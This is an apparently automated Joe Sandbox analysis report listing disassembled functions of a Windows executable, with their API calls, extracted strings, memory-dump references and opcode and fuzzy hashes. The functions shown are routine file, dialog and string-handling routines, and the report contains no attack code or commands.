                                                                                  • Instruction ID: 4019fd73bf31ea70da8200b170fbb317a51c7dd7f351ac2b916db2290ecaaa4f
                                                                                  • Opcode Fuzzy Hash: b8862d3cfa1dbdbfa11efba7e2b2ca77a018b49bd4ad13b546bd8d053b503bab
                                                                                  • Instruction Fuzzy Hash: 82F01232524201ABCE21EF78F6C9C1A73E9BA057257691819F208D7552CF70FC90CA64
                                                                                  Function 00281FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00281FE5
                                                                                  • _wcslen.LIBCMT ref: 00281FF6
                                                                                  • _wcslen.LIBCMT ref: 00282006
                                                                                  • _wcslen.LIBCMT ref: 00282014
                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0027B371,?,?,00000000,?,?,?), ref: 0028202F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CompareString
                                                                                  • String ID:
                                                                                  • API String ID: 3397213944-0
                                                                                  • Opcode ID: ffce986f94391c51b5fbddc8335891f47a9f8035b3f546ef996e94427c960d67
                                                                                  • Instruction ID: 83310b8c613f4264e06a8f2c1bc1e29df2f5391e4ec65830d43c0f96923fcf3b
                                                                                  • Opcode Fuzzy Hash: ffce986f94391c51b5fbddc8335891f47a9f8035b3f546ef996e94427c960d67
                                                                                  • Instruction Fuzzy Hash: D2F01D32028014BBCF26AF91EC09E8A7F26EF55760B118415F65A5A0A1CB729675DB90
                                                                                  Function 002815FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _swprintf
                                                                                  • String ID: %ls$%s: %s
                                                                                  • API String ID: 589789837-2259941744
                                                                                  • Opcode ID: a39e049140fa25632d43ec3e4761482f47d9182df5bff84df1643ef8a73a7b52
                                                                                  • Instruction ID: 8045dfe6ed73fd53fa64ab36aec8f0583a59eac3e218928cfaf3897ca2ecaf0c
                                                                                  • Opcode Fuzzy Hash: a39e049140fa25632d43ec3e4761482f47d9182df5bff84df1643ef8a73a7b52
                                                                                  • Instruction Fuzzy Hash: 5151CB3D676310F6FA113A908D47F75B25D6B05B04F24894AF3CB744D1DAF2A832AB1A
                                                                                  Function 00297F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\OisrvsB6Ea.exe,00000104), ref: 00297FAE
                                                                                  • _free.LIBCMT ref: 00298079
                                                                                  • _free.LIBCMT ref: 00298083
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                  • API String ID: 2506810119-3408394523
                                                                                  • Opcode ID: c4158c70a11acf3bdb2673efc11f023452bd21d7b9d86fab97faf216086e7f08
                                                                                  • Instruction ID: 717f1e9cbee68e483df9f6753b4caa15e033509e20cf71f838f5cbafca038c3d
                                                                                  • Opcode Fuzzy Hash: c4158c70a11acf3bdb2673efc11f023452bd21d7b9d86fab97faf216086e7f08
                                                                                  • Instruction Fuzzy Hash: 3831D370A20209EFDF21DF99D88599EBBFCEF96310F18406BF80497210DA718E54CBA0
                                                                                  Function 002931D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002931FB
                                                                                  • _abort.LIBCMT ref: 00293306
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer_abort
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 948111806-2084237596
                                                                                  • Opcode ID: 248f72ae026613ff5e14e12bfe9265e72a1e61b1df03b73f8b84fca604bcfcda
                                                                                  • Instruction ID: 361e5a4ca861f63c8c8cefba865f1892ab11b85ccd6e579c38c0bce44c9820fd
                                                                                  • Opcode Fuzzy Hash: 248f72ae026613ff5e14e12bfe9265e72a1e61b1df03b73f8b84fca604bcfcda
                                                                                  • Instruction Fuzzy Hash: CE414A71D1020AAFCF15DF94CD81AEEBBB5BF48304F188099F904A7211D735AE60DB94
                                                                                  Function 00277401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00277406
                                                                                    • Part of subcall function 00273BBA: __EH_prolog.LIBCMT ref: 00273BBF
                                                                                  • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 002774CD
                                                                                    • Part of subcall function 00277A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277AAB
                                                                                    • Part of subcall function 00277A9C: GetLastError.KERNEL32 ref: 00277AF1
                                                                                    • Part of subcall function 00277A9C: CloseHandle.KERNEL32(?), ref: 00277B00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 3813983858-639343689
                                                                                  • Opcode ID: 613ed78a40b22865090ec1b9b795aa2fa567980df409cc72e4fd68f1de335157
                                                                                  • Instruction ID: e85adde7313149a19164c621d38b80e433a2445566ff83ed7e0aad23a9e142fa
                                                                                  • Opcode Fuzzy Hash: 613ed78a40b22865090ec1b9b795aa2fa567980df409cc72e4fd68f1de335157
                                                                                  • Instruction Fuzzy Hash: 8431C571D24249AADF11EFA4DC49FFEBBB9AF05304F048015F849A7182DB748A64CF61
                                                                                  Function 0028AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028AD98
                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0028ADAD
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028ADC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 445417207-3402441367
                                                                                  • Opcode ID: 55afa8d1f763ca6ae46270e5a594575710708dcf5a5516cad2cfd08a774cc4b2
                                                                                  • Instruction ID: 8150a514f08a62b4ad8aea12abef6a82e23f2907f916d47cb1f298f161ef5adf
                                                                                  • Opcode Fuzzy Hash: 55afa8d1f763ca6ae46270e5a594575710708dcf5a5516cad2cfd08a774cc4b2
                                                                                  • Instruction Fuzzy Hash: 0E11B436662201BFE721AF68ED09FA63769AF4A702F004013F245DA5E0CB619D359B23
                                                                                  Function 0028DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DialogBoxParamW.USER32(GETPASSWORD1,0001047E,0028B270,?,?), ref: 0028DE18
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DialogParam
                                                                                  • String ID: GETPASSWORD1$r($xz,
                                                                                  • API String ID: 665744214-1991616170
                                                                                  • Opcode ID: 083c8376658550361cbcf389997ab7261c8ca7b4bdb21afcd0b59383fe85587c
                                                                                  • Instruction ID: 0ef134cd4e8af20c0db116ece4a0b7462d512f210d5d6991f8acd36f4a67403b
                                                                                  • Opcode Fuzzy Hash: 083c8376658550361cbcf389997ab7261c8ca7b4bdb21afcd0b59383fe85587c
                                                                                  • Instruction Fuzzy Hash: 93115E36625144ABDB11EE34BC05BEB33A8A70A351F148475FD49AB0C1CBB0AD64C764
                                                                                  Function 0027D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __fprintf_l.LIBCMT ref: 0027D954
                                                                                  • _strncpy.LIBCMT ref: 0027D99A
                                                                                    • Part of subcall function 00281DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,002B1030,?,0027D928,00000000,?,00000050,002B1030), ref: 00281DC4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                  • String ID: $%s$@%s
                                                                                  • API String ID: 562999700-834177443
                                                                                  • Opcode ID: 768c8b9ab64c1bf83201ddd54b50396a0324c99516e3e56412c6cd4ad30b745e
                                                                                  • Instruction ID: e61c6635b02ada2fedbb89089fcd36de7405571dea6db90e96570d97b67a9809
                                                                                  • Opcode Fuzzy Hash: 768c8b9ab64c1bf83201ddd54b50396a0324c99516e3e56412c6cd4ad30b745e
                                                                                  • Instruction Fuzzy Hash: 79219376460249EADF20EEA4CC05FDE7BB8AF06700F048011FA1896192E672D668CF51
                                                                                  Function 00280E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0027AC5A,00000008,?,00000000,?,0027D22D,?,00000000), ref: 00280E85
                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0027AC5A,00000008,?,00000000,?,0027D22D,?,00000000), ref: 00280E8F
                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0027AC5A,00000008,?,00000000,?,0027D22D,?,00000000), ref: 00280E9F
                                                                                  Strings
                                                                                  • Thread pool initialization failed., xrefs: 00280EB7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: 72a67247a3d5e8a52f5aea423fe9bd2b0b3234bdffdc5bf587e789eb6d657ecc
                                                                                  • Instruction ID: d1468e4d1ff090f39e1023f9b376d487038d326e67d7ed26f2e94e10632f8b2f
                                                                                  • Opcode Fuzzy Hash: 72a67247a3d5e8a52f5aea423fe9bd2b0b3234bdffdc5bf587e789eb6d657ecc
                                                                                  • Instruction Fuzzy Hash: 3C11E7B16117099FC3316F7A9CC89A7FBDCEB55740F104C2EF1DAC2241DAB159508B50
                                                                                  Function 0027124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Malloc
                                                                                  • String ID: (($2($A
                                                                                  • API String ID: 2696272793-1282021134
                                                                                  • Opcode ID: 82114cfadad93fee6de0e13e355b2c6dd33d1481bd31dcf52515a20bff5d9779
                                                                                  • Instruction ID: 9eff14e8acc027df3629059018291bef9708ab45fb11f0fc34f01515dcbe615a
                                                                                  • Opcode Fuzzy Hash: 82114cfadad93fee6de0e13e355b2c6dd33d1481bd31dcf52515a20bff5d9779
                                                                                  • Instruction Fuzzy Hash: D201ED75D01229AFCB14DFA4E848ADEBBF8FF09310B10816AE909E3250D7749E50CFA5
                                                                                  Function 0028DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 455659108e853fb66f060318a69579ec494d883f5eb43749cb019827f8a53a05
                                                                                  • Instruction ID: fa0d9d11290ca4b87876165b8835a990fbe5e285dc728e81a76be6b400c64f6d
                                                                                  • Opcode Fuzzy Hash: 455659108e853fb66f060318a69579ec494d883f5eb43749cb019827f8a53a05
                                                                                  • Instruction Fuzzy Hash: C601923A525245AFCB10AF54FC48A967BA8F709354B100526F805832F2C7709C74DBE0
                                                                                  Function 00271316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0027E2E8: _swprintf.LIBCMT ref: 0027E30E
                                                                                    • Part of subcall function 0027E2E8: _strlen.LIBCMT ref: 0027E32F
                                                                                    • Part of subcall function 0027E2E8: SetDlgItemTextW.USER32(?,002AE274,?), ref: 0027E38F
                                                                                    • Part of subcall function 0027E2E8: GetWindowRect.USER32(?,?), ref: 0027E3C9
                                                                                    • Part of subcall function 0027E2E8: GetClientRect.USER32(?,?), ref: 0027E3D5
                                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                  • SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                  • String ID: ($0
                                                                                  • API String ID: 2622349952-1122952887
                                                                                  • Opcode ID: 3eccce0cf9ae93f1a4b5d06c5f724b70ce309d4ce639d5d6bcc5becc692e640a
                                                                                  • Instruction ID: aec566e580b6564d6bdb06860ae19c950ae10173c3442953e3d83fd3aa768a9d
                                                                                  • Opcode Fuzzy Hash: 3eccce0cf9ae93f1a4b5d06c5f724b70ce309d4ce639d5d6bcc5becc692e640a
                                                                                  • Instruction Fuzzy Hash: 77F0AF3052428AAADF155F68DC0EBEA3B78AF09384F04C596FC4C545A1CB74C9B0EA20
                                                                                  Function 00299A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                  • Instruction ID: 7a2e0274c84661d4ffe2bf89e44dd9f394c91793d76ca06bd1c9d41564d64aae
                                                                                  • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                  • Instruction Fuzzy Hash: CFA149729203869FEF25CF1CC8917AEBBE5EF55320F18416EE4459B281C6399DE1CB50
                                                                                  Function 0027A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00277F69,?,?,?), ref: 0027A3FA
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00277F69,?), ref: 0027A43E
                                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00277F69,?,?,?,?,?,?,?), ref: 0027A4BF
                                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,00277F69,?,?,?,?,?,?,?,?,?,?), ref: 0027A4C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 2287278272-0
                                                                                  • Opcode ID: 04757017ff84ffeab4d2f2ab66bb5e2f8ffdd31a3c632388dd0bdbbcc0447599
                                                                                  • Instruction ID: a8afd1462669a7b3e5f39c08149f311e6712fd5fad84ca282e2d0f7fc85da19a
                                                                                  • Opcode Fuzzy Hash: 04757017ff84ffeab4d2f2ab66bb5e2f8ffdd31a3c632388dd0bdbbcc0447599
                                                                                  • Instruction Fuzzy Hash: AF41DF312583829BD721EF24DC5AFAFBBE8ABC1310F04895DB5D8931C0D6B49A58DB53
                                                                                  Function 0029C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
